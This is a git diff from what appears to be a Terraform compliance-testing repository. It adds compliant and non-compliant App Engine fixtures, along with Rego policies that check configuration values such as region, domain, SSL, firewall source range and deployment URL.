"google_app_engine_standard_app_version" "c" { + project = "gcp-project-12345" + version_id = "v1" + service = "prod-web" + runtime = "nodejs20" + instance_class = "F1" + + entrypoint { shell = "node ./app.js" } + + + deployment { + zip { source_url = "https://storage.googleapis.com/appengine-static-content/hello-world.zip" } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/config.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/nc.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/nc.tf new file mode 100644 index 000000000..f10b3581e --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/nc.tf @@ -0,0 +1,14 @@ +resource "google_app_engine_standard_app_version" "nc" { + project = "gcp-project-12345" + version_id = "v1" + service = "dev-test" + runtime = "nodejs20" + instance_class = "F2" + + entrypoint { shell = "node ./app.js" } + + + deployment { + zip { source_url = "https://storage.googleapis.com/appengine-static-content/hello-world.zip" } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/plan.json b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/plan.json new file mode 100644 index 000000000..9e2ebc125 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/.terraform.lock.hcl new file mode 100644 index 000000000..5698484ba --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.16.0" + hashes = [ + "h1:o+dOw75zzgpJAUdjEa2a2T62OEThcEr52/4CymRAewA=", + "zh:1cd6f0926e5884998965675d3fbdc5e5abd7335d3f5f83571226be7f50f44443", + "zh:2bc3e3db662df08755af37d23c856f0ec3b8474f629f042ad3af228ff1c3cb5a", + "zh:41869013f786bff8c2ba35e203e84b6c3ec9ff623d6cea6796f5f0204719e907", + "zh:493213e16cb8de6a39b0d6b327faab7909f32ad973fb937d2b3bc4faa07c911a", + "zh:5e9df66ddeef9fcf77acd6185fe880e6b3725b98850ea3b47ef726c44dc04a71", + "zh:6b9e8f83316cf660549a4032342107bb41a7e549eba923f69aefa1ae5ab80a3f", + "zh:6da9316ca7c70d4997c4a62cd534f674e02888e351cb189f7b77b5a03e803773", + "zh:7d1b1dc7c04924dd203e9c5d2041fb732b1e2556b4041c9272a786d37924be7c", + "zh:86dcafef126ad72b592582d8fdb2591d8a2cb45ff85e5f5ff0ac76fbbd7be1bb", + "zh:8a8994c67297336ede3ded9d2558104d49de6fdfa85b88dc99b50030d68158cf", + "zh:a67d8b4774cdb45fb13e73e15885e229561a8b8f46d9f0069b81bf4d3ca03c4a", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/c.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/c.tf new file mode 100644 index 000000000..64d2de356 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/c.tf @@ -0,0 +1,16 @@ +resource "google_app_engine_standard_app_version" "c" { + project = "gcp-project-12345" + version_id = "v1" + service = "default" + runtime = "nodejs20" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "https://storage.googleapis.com/appengine-static-content/hello-world.zip" + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/config.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/nc.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/nc.tf new file mode 100644 index 000000000..369322699 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/nc.tf @@ -0,0 +1,16 @@ +resource "google_app_engine_standard_app_version" "nc" { + project = "gcp-project-12345" + version_id = "v1" + service = "default" + runtime = "nodejs10" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "https://storage.googleapis.com/appengine-static-content/hello-world.zip" + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/plan.json b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/plan.json new file mode 100644 index 000000000..85a4275f5 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/service/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_standard_app_version/service/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/service/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/service/c.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/service/c.tf new file mode 100644 index 000000000..ce7f465ea --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/service/c.tf @@ -0,0 +1,36 @@ +resource "google_service_account" "custom_service_account" { + account_id = "my-account-c" + display_name = "Custom Service Account" + project = "appeng-flex" +} + +resource "google_storage_bucket" "bucket" { + name = "hardhat-standard-static-content" + location = "US" + project = "appeng-flex" +} + +resource "google_storage_bucket_object" "object" { + name = "hello-world.zip" + bucket = google_storage_bucket.bucket.name + source = "./test-fixtures/hello-world.zip" +} + +resource "google_app_engine_standard_app_version" "c" { + version_id = "v1" + project = "appeng-flex" + service = "default" + runtime = "nodejs20" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com{google_storage_bucket.bucket.name}/${google_storage_bucket_object.object.name}" + } + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/service/config.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/service/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/service/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/service/nc.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/service/nc.tf new file mode 100644 index 000000000..c27293e20 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/service/nc.tf @@ -0,0 +1,18 @@ +resource "google_app_engine_standard_app_version" "nc" { + project = "gcp-project-12345" + version_id = "v1" + service = "unauthorized-app-name" + runtime = "nodejs10" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "https://storage.googleapis.com/${google_storage_bucket.bucket.name}/${google_storage_bucket_object.object.name}" + } + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/service/plan.json b/inputs/gcp/app_engine/app_engine_standard_app_version/service/plan.json new file mode 100644 index 000000000..3bf62f2b3 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_standard_app_version/service/plan.json differ diff --git a/policies/gcp/app_engine/app_engine_application/database_type/policy.rego b/policies/gcp/app_engine/app_engine_application/database_type/policy.rego new file mode 100644 index 000000000..705b411c8 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/database_type/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application.database_type + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application.vars + +conditions := [ + [ + { + "situation_description": "App Engine application is utilising a database type that is not allowed", + "remedies": ["Use CLOUD_FIRESTORE as the database type for App Engine applications"] + }, + { + "condition": "Whitelist approved database type", + "attribute_path": ["database_type"], + "values": ["CLOUD_FIRESTORE"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/policy.rego b/policies/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/policy.rego new file mode 100644 index 000000000..8703bb9ab --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application.split_health_checks + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application.vars + +conditions := [ + [ + { + "situation_description": "App Engine is using legacy health checks", + "remedies": ["Set feature_settings.split_health_checks to 'true' to use readiness and liveness checks"] + }, + { + "condition": "Ensure that split health checks are enabled", + "attribute_path": ["feature_settings", 0, "split_health_checks"], + "values": [true], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application/iap/oauth2_client_id/policy.rego b/policies/gcp/app_engine/app_engine_application/iap/oauth2_client_id/policy.rego new file mode 100644 index 000000000..09d418824 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/iap/oauth2_client_id/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application.oauth2_client_id + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application.vars + +conditions := [ + [ + { + "situation_description": "App Engine IAP is using an unapproved OAuth2 Client ID", + "remedies": ["Ensure setting iap.oauth2_client_id to the approved Client ID"] + }, + { + "condition": "Whitelist approved OAuth2 Client ID", + "attribute_path": ["iap", 0, "oauth2_client_id"], + "values": ["12345.apps.googleusercontent.com"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/policy.rego b/policies/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/policy.rego new file mode 100644 index 000000000..8bbfb05ec --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application.iap.oauth2_client_secret + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application.vars + +conditions := [ + [ + { + "situation_description": "OAuth2 Client Secret is missing/invalid", + "remedies": ["Please provide the valid client secret"] + }, + { + "condition": "Ensure client secret is not a placeholder", + "attribute_path": ["iap", 0, "oauth2_client_secret"], + "values": ["password", "12345"], + "policy_type": "blacklist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application/location_id/policy.rego b/policies/gcp/app_engine/app_engine_application/location_id/policy.rego new file mode 100644 index 000000000..ca2b409d2 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/location_id/policy.rego @@ -0,0 +1,21 @@ +package terraform.gcp.security.app_engine.app_engine_application.location_id + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application.vars + +conditions := [ + [ + {"situation_description" : "App Engine application is being deployed within an unapproved region", + "remedies":[ "Location should be an approved region, e.g., australia-southeast1"]}, + { + "condition": "Check if location_id is allowed", + "attribute_path": ["location_id"], + "values" : ["australia-southeast1", "australia-southeast2"], + "policy_type" : "whitelist" + } + ] +] + + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application/project/policy.rego b/policies/gcp/app_engine/app_engine_application/project/policy.rego new file mode 100644 index 000000000..16d906b32 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/project/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application.project + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application.vars + +conditions := [ + [ + { + "situation_description": "App Engine application is being deployed to an invalid project", + "remedies": ["Set the 'project' attribute to an approved Hardhat Enterprises Project ID"] + }, + { + "condition": "Whitelist approved Project IDs", + "attribute_path": ["project"], + "values": ["gcp-project-12345"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application/serving_status/policy.rego b/policies/gcp/app_engine/app_engine_application/serving_status/policy.rego new file mode 100644 index 000000000..5f93f8bfa --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/serving_status/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application.serving_status + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application.vars + +conditions := [ + [ + { + "situation_description": "App Engine application is not serving traffic", + "remedies": ["Please set serving_status to SERVING for the App Engine application"] + }, + { + "condition": "Ensure that application is serving traffic", + "attribute_path": ["serving_status"], + "values": ["SERVING"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application/ssl_policy/policy.rego b/policies/gcp/app_engine/app_engine_application/ssl_policy/policy.rego new file mode 100644 index 000000000..19c01fab5 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/ssl_policy/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application.ssl_policy + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application.vars + +conditions := [ + [ + { + "situation_description": "App Engine Application is using an unspecified SSL policy", + "remedies": ["Ensure ssl_policy is set to DEFAULT or MODERN"] + }, + { + "condition": "Blacklist SSL_POLICY_UNSPECIFIED", + "attribute_path": ["ssl_policy"], + "values": ["SSL_POLICY_UNSPECIFIED"], + "policy_type": "blacklist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application/vars.rego b/policies/gcp/app_engine/app_engine_application/vars.rego new file mode 100644 index 000000000..77ab28572 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/vars.rego @@ -0,0 +1,8 @@ +package terraform.gcp.security.app_engine.app_engine_application.vars + + +variables := { + "friendly_resource_name": "App Engine Application", # eg., "GCS Bucket", + "resource_type": "google_app_engine_application", # eg., "google_storage_bucket" + "resource_value_name" : "name" # eg., "name" +} \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/policy.rego b/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/policy.rego new file mode 100644 index 000000000..dd06b228e --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application_url_dispatch_rules.dispatch_rules.dispatch_rules_domain + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application_url_dispatch_rules.vars + +conditions := [ + [ + { + "situation_description": "Dispatch rule uses an unapproved domain", + "remedies": ["Set the domain to 'hardhat.pythonanywhere.com' or a '*.hardhatenterprises.com' subdomain"] + }, + { + "condition": "Check dispatch_rules.domain", + "attribute_path": ["dispatch_rules", 0, "domain"], + "values": ["hardhat.pythonanywhere.com", "*.hardhatenterprises.com"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/policy.rego b/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/policy.rego new file mode 100644 index 000000000..66bcb072a --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application_url_dispatch_rules.dispatch_rules.dispatch_rules_path + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application_url_dispatch_rules.vars + +conditions := [ + [ + { + "situation_description": "A dispatch rule path is invalid", + "remedies": ["Ensure that the path begins with a forward slash (e.g., '/', '/*', '/api/*')"] + }, + { + "condition": "Check dispatch_rules.path starts with slash", + "attribute_path": ["dispatch_rules", 0, "path"], + "values": ["*/*", [ ["/"], [] ] ], + "policy_type": "pattern whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/policy.rego b/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/policy.rego new file mode 100644 index 000000000..0abdf3b5d --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application_url_dispatch_rules.dispatch_rules.dispatch_rules_service + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application_url_dispatch_rules.vars + +conditions := [ + [ + { + "situation_description": "Dispatch rule routes traffic to an unapproved service", + "remedies": ["Set dispatch_rules.service to an approved service (e.g. 'default' or 'admin')"] + }, + { + "condition": "Check that dispatch_rules.service is whitelisted", + "attribute_path": ["dispatch_rules", 0, "service"], + "values": ["default", "admin", "api-gateway"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/vars.rego b/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/vars.rego new file mode 100644 index 000000000..e9448eed0 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/vars.rego @@ -0,0 +1,8 @@ +package terraform.gcp.security.app_engine.app_engine_application_url_dispatch_rules.vars + + +variables := { + "friendly_resource_name": "App Engine Application URL dispatch Rules", # eg., "GCS Bucket", + "resource_type": "google_app_engine_application_url_dispatch_rules", # eg., "google_storage_bucket" + "resource_value_name" : "name" # eg., "name" +} \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_domain_mapping/domain_name/policy.rego b/policies/gcp/app_engine/app_engine_domain_mapping/domain_name/policy.rego new file mode 100644 index 000000000..e1e75a37c --- /dev/null +++ b/policies/gcp/app_engine/app_engine_domain_mapping/domain_name/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_domain_mapping.domain_name + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_domain_mapping.vars + +conditions := [ + [ + { + "situation_description": "Domain mapping is utilising an unapproved domain name", + "remedies": ["Use an approved domain: 'hardhat.pythonanywhere.com' or 'hardhatenterprises.com'"] + }, + { + "condition": "Check domain_name against whitelist", + "attribute_path": ["domain_name"], + "values": ["hardhat.pythonanywhere.com", "hardhatenterprises.com"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_domain_mapping/override_strategy/policy.rego b/policies/gcp/app_engine/app_engine_domain_mapping/override_strategy/policy.rego new file mode 100644 index 000000000..6001fe1ff --- /dev/null +++ b/policies/gcp/app_engine/app_engine_domain_mapping/override_strategy/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_domain_mapping.override_strategy + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_domain_mapping.vars + +conditions := [ + [ + { + "situation_description": "override_strategy is invalid", + "remedies": ["Ensure that override_strategy is set to 'STRICT'"] + }, + { + "condition": "Check that override_strategy is valid", + "attribute_path": ["override_strategy"], + "values": ["STRICT"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/policy.rego b/policies/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/policy.rego new file mode 100644 index 000000000..9a8f63b74 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_domain_mapping.ssl_settings.ssl_management_type + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_domain_mapping.vars + +conditions := [ + [ + { + "situation_description": "SSL management type is invalid", + "remedies": ["Set ssl_management_type to 'AUTOMATIC'"] + }, + { + "condition": "Check ssl_management_type is valid", + "attribute_path": ["ssl_settings", 0, "ssl_management_type"], + "values": ["AUTOMATIC"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_domain_mapping/vars.rego b/policies/gcp/app_engine/app_engine_domain_mapping/vars.rego new file mode 100644 index 000000000..4014c7113 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_domain_mapping/vars.rego @@ -0,0 +1,8 @@ +package terraform.gcp.security.app_engine.app_engine_domain_mapping.vars + + +variables := { + "friendly_resource_name": "App Engine Domain Mapping", # eg., "GCS Bucket", + "resource_type": "google_app_engine_domain_mapping", # eg., "google_storage_bucket" + "resource_value_name" : "name" # eg., "name" +} \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_firewall_rule/action/policy.rego b/policies/gcp/app_engine/app_engine_firewall_rule/action/policy.rego new file mode 100644 index 000000000..17bb976d0 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_firewall_rule/action/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_firewall_rule.action + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_firewall_rule.vars + +conditions := [ + [ + { + "situation_description": "Firewall rule action is not compliant", + "remedies": ["Set action to 'ALLOW' for this firewall rule"] + }, + { + "condition": "Check firewall action is 'ALLOW'", + "attribute_path": ["action"], + "values": ["ALLOW"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_firewall_rule/priority/policy.rego b/policies/gcp/app_engine/app_engine_firewall_rule/priority/policy.rego new file mode 100644 index 000000000..bfa4984a0 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_firewall_rule/priority/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_firewall_rule.priority + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_firewall_rule.vars + +conditions := [ + [ + { + "situation_description": "Firewall rule priority is not within approved range", + "remedies": ["Set the priority to a value between 1 and 2,147,483,646"] + }, + { + "condition": "Check firewall rule priority is within approved range", + "attribute_path": ["priority"], + "values": [1, 2147483646], + "policy_type": "range" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_firewall_rule/source_range/policy.rego b/policies/gcp/app_engine/app_engine_firewall_rule/source_range/policy.rego new file mode 100644 index 000000000..ed3ccb67a --- /dev/null +++ b/policies/gcp/app_engine/app_engine_firewall_rule/source_range/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_firewall_rule.source_range + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_firewall_rule.vars + +conditions := [ + [ + { + "situation_description": "Firewall rule allows traffic from all sources (*)", + "remedies": ["Replace '*' with a specific CIDR range (such as '192.168.1.0/24' or '1.2.3.4/32')"] + }, + { + "condition": "Block wildcard source ranges", + "attribute_path": ["source_range"], + "values": ["*"], + "policy_type": "blacklist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_firewall_rule/vars.rego b/policies/gcp/app_engine/app_engine_firewall_rule/vars.rego new file mode 100644 index 000000000..dc6452865 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_firewall_rule/vars.rego @@ -0,0 +1,8 @@ +package terraform.gcp.security.app_engine.app_engine_firewall_rule.vars + + +variables := { + "friendly_resource_name": "App Engine Firewall Rule", # eg., "GCS Bucket", + "resource_type": "google_app_engine_firewall_rule", # eg., "google_storage_bucket" + "resource_value_name" : "name" # eg., "name" +} \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/policy.rego new file mode 100644 index 000000000..40727dbad --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.automatic_scaling.cpu_utilization.target_utilization + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine CPU target utilization is not within the approved range", + "remedies": ["Set 'automatic_scaling.cpu_utilization.target_utilization' to a value between 0.5 and 0.8"] + }, + { + "condition": "Check CPU target utilization is within the approved range", + "attribute_path": ["automatic_scaling", 0, "cpu_utilization", 0, "target_utilization"], + "values": [0.5, 0.8], + "policy_type": "range" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/policy.rego new file mode 100644 index 000000000..395ea1d99 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.deployment.zip.source_url + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine application code is being deployed from an unauthorized source URL", + "remedies": ["Set 'deployment.zip.source_url' to an authorized GCS URL"] + }, + { + "condition": "Match against exact approved deployment URLs", + "attribute_path": ["deployment", 0, "zip", 0, "source_url"], + "values": ["https://storage.googleapis.com/hardhat-bucket/hello-world.zip"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/policy.rego new file mode 100644 index 000000000..46a68a242 --- /dev/null +++ 